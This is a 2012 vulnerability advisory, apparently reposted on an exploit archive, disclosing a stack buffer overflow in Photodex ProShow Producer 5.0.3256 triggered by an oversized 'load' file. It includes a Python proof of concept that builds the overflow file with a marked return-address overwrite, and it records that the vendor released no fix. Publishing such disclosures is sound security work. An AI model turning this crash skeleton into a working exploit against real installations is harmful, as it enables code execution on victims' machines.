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Photodex ProShow Producer 5.0.3256 Buffer Overflow
1. ADVISORY INFORMATION ----------------------- Product: Photodex ProShow Producer Vendor URL: www.photodex.com Type: Stack-based Buffer Overflow [CWE-121] Date found: 2012-06-06 Date published: 2012-07-02 CVSSv2 Score: 6,9 (AV:L/AC:M/Au:N/C:C/I:C/A:C) CVE: - 2. CREDITS ---------- This vulnerability was discovered and researched by Julien Ahrens from Inshell Security. 3. VERSIONS AFFECTED -------------------- Photodex ProShow Producer v5.0.3256, older versions may be affected too. 4. VULNERABILITY DESCRIPTION ---------------------------- A Local Buffer Overflow Vulnerability has been found on the Photodex ProShow Producer v5.0.3256. When starting, the application loads the contents of the "load" file from its application directory. The application does not validate the length of the string loaded from the "load" file before passing it to a buffer, which leads to a Buffer Overflow. An attacker needs to force the victim to place an arbitrary "load" file into the application directory. 5. PROOF-OF-CONCEPT (CODE / Exploit) ------------------------------------ #!/usr/bin/python file="load" junk1="\x41" * 9848 boom="\x42\x42\x42\x42" junk2="\x43" * 100 poc=junk1 + boom + junk2 try: print "[*] Creating exploit file...\n"; writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() print "[*] File successfully created!"; except: print "[!] Error while creating file!"; For further Screenshots and/or PoCs visit: http://security.inshell.net/advisory/30 6. SOLUTION ----------- None 7. REPORT TIMELINE ------------------ 2012-06-06: Initial notification sent to vendor 2012-06-12: No response, second notification sent to vendor 2012-06-20: No response, third notification sent to vendor 2012-06-20: Vendor response, sent to appropriate departments 2012-07-02: No further contact by vendor 2012-07-02: Full Disclosure # 0day.today [2024-11-14] #